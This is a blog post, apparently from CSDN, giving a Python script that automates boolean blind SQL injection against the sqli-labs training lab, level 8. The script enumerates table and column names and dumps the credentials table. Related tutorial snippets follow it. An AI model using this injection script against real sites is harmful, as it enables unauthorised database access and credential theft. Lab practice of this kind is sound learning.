python编写exp破sqli-labs第8关

已于 2022-05-22 17:50:53 修改
阅读量426 收藏 3
点赞数 2
分类专栏: 网络安全 python 文章标签: python 网络安全
于 2022-05-22 17:20:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013930899/article/details/124913257
版权

       在打sqli-labs关卡时,手工用来验证可以,但全部搂出数据有些吃力了,可以使用burp suite或者编写自动化工具进行。

        本文是用python编写的自动化工具打第8关,详细代码如下。

        备注:

                1、本文是用docker搭建的sqli-labs,代码中仅作为实现功能的逻辑,并未做符合python代码规范和标准书写。

                2、要求会requests模块的使用。

import requests
import string
from test.request_s import ascii

# ascii码的范围是32-126

# 本程序测试sqli-labs第8关
# for循环测试数据库有几位,len不一样的即是数据库位数
def db_len(IP):
    for n in range(20):
        URL = "http://{}/Less-8/?id=1\' " \
              "and length(database())={} --+".format(IP, n)
        res = requests.get(url=URL)
        # 第一次运行len(res.text)得到的是723,需要提前知道723不是正确的数据库位数
        if len(res.text) != 722:
            return n

# 测试数据库的数据库名
def db_name(IP, dblen):
    dbname = ""
    for n in range(9):
        # 使用string模块的ascii_lowercase生成a-z的小写字母,大写字母方法是ascii_uppercase
        for alpha in string.ascii_lowercase:
            URL1 = "http://{}/Less-8/?id=1' " \
                   "and substr(database(),{},1)='{}' --+".format(IP, n, alpha)
            res1 = requests.get(url=URL1)
            if len(res1.text) != 722:
                dbname = dbname + alpha
    return dbname


# 函数查数据库中表的数量,不适合爆大表
def tbl_count(IP):
    for n in range(50):
        URL = "http://{}/Less-8/?id=1' " \
          "and substr((select count(table_name) from information_schema.tables " \
          "where table_schema=database()),1)={} --+".format(IP, n)
        res = requests.get(url=URL)
        if len(res.text) != 722:
            return n


# 函数输出表长度
def tbl_len(IP,i):
    for n in range(20):
        URL2 = "http://{}/Less-8/?id=1' " \
           "and length((select table_name from information_schema.tables " \
           "where table_schema=database() limit {},1))={} --+".format(IP, i, n)
        res = requests.get(url=URL2)
        if len(res.text) != 722:
            return n


# 函数输入表长度,输出表名
def tbl_name(IP, i, t_len):
    tblname = ""
    for n in range(t_len + 1):
        # 使用string模块的ascii_lowercase生成a-z的小写字母,大写字母方法是ascii_uppercase
        for alpha in string.ascii_lowercase:
            URL3 = "http://{}/Less-8/?id=1' " \
                   "and substr((select table_name from information_schema.tables " \
                   "where table_schema=database() limit {},1),{},1)='{}' --+"\
                .format(IP, i,n,alpha)
            res1 = requests.get(url=URL3)
            if len(res1.text) != 722:
                tblname = tblname + alpha
    return tblname


# 再补充大写字母,符号
def make_alpha_num():
    a2z = string.ascii_lowercase
    A2Z = string.ascii_uppercase
    numbers = "0123456789"
    special_char = ',.'
    params = a2z + A2Z + numbers + special_char
    return params


# 获取表中所有字段group_concat后的长度
def get_col_len(IP,tbl_name):
    for n in range(500):
        URL = "http://{}/Less-8/?id=1' " \
          "and length((select group_concat(column_name) " \
              "from information_schema.columns " \
          "where table_schema=database() and table_name='{}'))={} --+"\
            .format(IP, tbl_name, n)
        res = requests.get(url=URL)
        if len(res.text) !=722:
            return n


# 获取表所有字段名
def get_columns(IP, tbl_name, col_len):
    tbl_columns = ""
    for n in range(col_len + 1):
        for param in range(32,127):
            URL = "http://{}/Less-8/?id=1' " \
                "and ascii(substr((select group_concat(column_name) " \
                "from information_schema.columns " \
                "where table_schema=database() and table_name='{}'),{},1))={} --+"\
                .format(IP, tbl_name, n, param)
            res = requests.get(url=URL)
            if len(res.text) != 722:
                ascii2alpha = ascii.ascii_alpha(param)
                tbl_columns = tbl_columns + ascii2alpha
    return tbl_columns


# 获得表中行数
def get_rows(IP, tbl_name):
    for n in range(50):
        URL = "http://{}/Less-8/?id=1' " \
              "and substr((select count(username) from {}),1)={} --+"\
            .format(IP, tbl_name, n)
        res = requests.get(url=URL)
        if len(res.text) != 722:
            return n

# 获得表中数据
def get_tbl_contens(IP, tbl_name):
    tbl_contens = ""
    # 跑200个循环太慢
    for n in range(200):
        for param in range(32,127):
            URL = "http://{}/Less-8/?id=1' " \
                  "and  ascii(substr((select group_concat(username,':',password) " \
                  "from {}),{},1))={} --+".format(IP, tbl_name, n, param)
            res = requests.get(url=URL)
            if len(res.text) !=722:
                ascii2alpha = ascii.ascii_alpha(param)
                tbl_contens = tbl_contens + ascii2alpha
    return tbl_contens


IP = "192.168.101.45"
tbl_name = "users"
col_len = get_col_len(IP, tbl_name)
tbl_columns = get_columns(IP, tbl_name, col_len)
print("{} 表中的字段group_concat组合是:{}".format(tbl_name, tbl_columns))
tbl_rows = get_rows(IP, tbl_name)
print("{}表中共{}行".format(tbl_name, tbl_rows))
tbl_contens = get_tbl_contens(IP, tbl_name)
print("{}表中的内容是:{}".format(tbl_name, tbl_contens)) #运行时间有些长

        补充from test.request_s import ascii的代码,主要功能是实现字母和ascii码之间的转换。

# 将字母a转成ascii码
def alpha_ascii(alpha):
    alpha2ascii = ord(alpha)
    return alpha2ascii

# 将ascii码转成字母
def ascii_alpha(ascii):
    ascii2alpha = chr(ascii)
    return ascii2alpha

 

        运行结果如下:

        users 表中的字段group_concat组合是:id,username,password
        users表中共13行
        users表中的内容是:Dumb:Dumb,Angelina:I-kill-you,Dummy:p@ssword,secure:crappy,stupid:stupidity,superman:genious,batman:mob!le,admin:admin,admin1:admin1,admin2:admin2,admin3:admin3,dhakkan:dumbo,admin4:admin4

        Process finished with exit code 0

見贤思齊
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
使用python进行sql布尔盲注exp编写
CC210231的博客
04-04 2535
前言: 前面学习并实现了简单的注入exp编写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
使用pythonsql-labs第八exp(练习)
Barlow_121212的博客
03-17 227
🌞①观察我们的响应包,当页面正常返回时有字符串 (You are in...........) 故我们可根据响应包中是否存在此字符串来判断exp是否成功。python代码可以直接写成全套的盲注exp,且更具有效率。更改代码,使用ascii,substr等函数跑出第一个字母。本文为更好的了解python以及复习sql注入中的盲注。只跑了users表和字段没有全部跑完(我想偷懒)。🌞③更改代码跑出库的名字。🌞跑字段的第二个字符的长度。跑第二个内容的第二个字母。跑第二个内容的所有字母。跑出第五个字段的字母。
SQL-labs-Burp(第八)
weixin_51706044的博客
04-03 1931
文章目录前言一、数据库长度二、数据库名三、爆表名总结 前言 在上篇文章中我们进行sqli-labs第八时选择的是手注,可见过程是多么繁琐,因此在本文将会演示如何使用Burp作为辅助工具进行爆 一、数据库长度 注入语句,进行爆判断 ?id=1' and length(database())=8 --+ 抓包 进行爆 处理数据 设置payload 进行攻击 判断出数据库的长度为:8 二、数据库名 代码块:?id=1' and ascii(substr(database(),1,1))=1
sqli-labs第八-布尔注入
weixin_51706044的博客
03-30 4170
文章目录布尔注入一、第八爆数据库名判断长度爆数据库名二、使用步骤总结 布尔注入 如果页面既没有显示位,也没有报错提示的话,可以使用布尔注入. 通过插入一些语句查看结果来判断是否存在布尔注入. 布尔注入的几个常用函数 函数使用: length(select database())>5 #length()里可以放查询语句,用来判断查询结果的长度 exists( ) #exists()里可以放查询语句,用来判断查询结果是否存在 ascii( ) #ascii()里可以放查询.
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sql-labs第八python脚本
西部壮仔的博客
03-22 1049
sql bool盲注 代码如下: # 1. 设置全局变量DIS 和list用于控制详细信息的显示以及定义需要爆的ASCII码 # 2. 爆当前数据库长度 # 3. 定义数据库长度爆函数Brute_length() # 4. 爆当前数据库名称 # 5. 定义数据库名爆函数Brute_database() # 6. 爆所有数据库长度 # 7. 爆所有数据库名称 # 8. 爆表名 # 9...
基于python的布尔盲注爆脚本(sqli-libs第八
henghengzhao_的博客
10-06 1834
写这个脚本的原因是因为布尔爆步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆
burp爆mysql_Burpsuite系列 -- 爆数据库名称
weixin_35796591的博客
02-23 1418
如果不是身上有烟,下雨天我都懒得打伞,如果不是有家人,我活着都嫌烦,如果不是有你,我都不想拥有最后的一点温柔。。。---- 网易云热评靶机环境:win7、phpstudy2018、sqli一、判断注入点1、页面正常访问的情况 2、在id=1后面加上and 1=1和and1=2分别进行测试,发现and1=2返回不正常,说明该处存在注入192.168.1.129/sqli/Less-2/?id=1 a...
python执行requests请求数据出现ascii编码问题
weixin_37254196的博客
03-24 2482
废话不多说,直接开讲 '稳宒编码问题 最近用python获取网页内容 竟然出现这个 其实是站长故意设置ascii编码 print(‘实际上也就是ascii编码:’,ascii(‘稳宒)) #coding=utf-8 1.1、ascii,用1个字节表示。 1.2、UTF-8,用1个至三个字节表示,表示ascii码时只占用1个字节,ascii编码是UTF-8的子集。 最早出现的“密码本”美国人发明叫做ASCII, ascii只能表示数字、英文字母和一些特殊符号,不能表示汉字 unicode
sqli-lab简单python实现通
Williu的博客
01-04 3351
刚开始学习sql注入的菜鸟,简单写下自己的理解,sql注入,肯定和数据库有系了。利用sql语句来实现对数据库的入侵并获取数据或者坏。 简单来说就是,利用sql语句来实现欺骗服务器,达到自己的目的。 比如: 我们要登录,需要输入用户名个和密码,然后后台数据库就会select SELECT * FROM users WHERE username = '张三' AND password = '123456' 然后我们改变他的查询方式,利用#或许–注释符 select * from users where u
sqli-labs卡8(基于get提交的单引号闭合的布尔盲注)通思路
zyh1588的博客
10-29 579
小白对sqli-labs靶场第八布尔盲注的理解
布尔型盲注(sqli第八
NLXHBM的博客
04-20 3277
1.求闭合字符 由此可以判断是单引号闭合字符 2.求当前数据库名的长度 二分法 ?id=1’ and length(database())=8 数据库名的长度为8 3.求当前数据库名对应的ASCII值 ?Id=1’ and ascii(substr(database(),1,1))=115 数据库名第一个字符对应的ASCII值为 115 s 数据库名第二个字符对应的ASCII值为101 e ...
sqli-labs 第八 多命通攻略(Python3 自动化实现布尔盲注)
两个月亮
01-09 707
在使用了这两种对布尔盲注的实现后,相信各位都感觉到了采用了二分查找算法的 Python 实现相比于普通的 Python 实现速度有很大的提升吧,这种执行速度上的差异会随着被判断字符串的长度而变得更为明显。在转换过程中,MySQL 将对字符串的每一个字符从左往右进行扫描,一旦遇到非数字的字符将停止继续扫描(如果字符串的第一个字符为非数字字符,则将该字符串转换为数值的结果为。),我们先对数据库的名称的长度位数进行判断,相信数据库名称的长度的位数是不可能超过。让我们构造语句来判断数据库名称的第一个字符是否为。
sqli-labs 第八 较详细通解释】
m0_71635484的博客
02-17 890
sqli-labs第八详解
sqli-labs第八
07-23
对于sqli-labs的第八,你可以尝试使用SQL注入来绕过登录验证。以下是一种可能的解决方案: 1. 在登录表单的用户名字段中输入 `' or '1'='1`,并在密码字段中输入任意值。 2. 提交表单后,应该会成功绕过登录验证...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

見贤思齊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值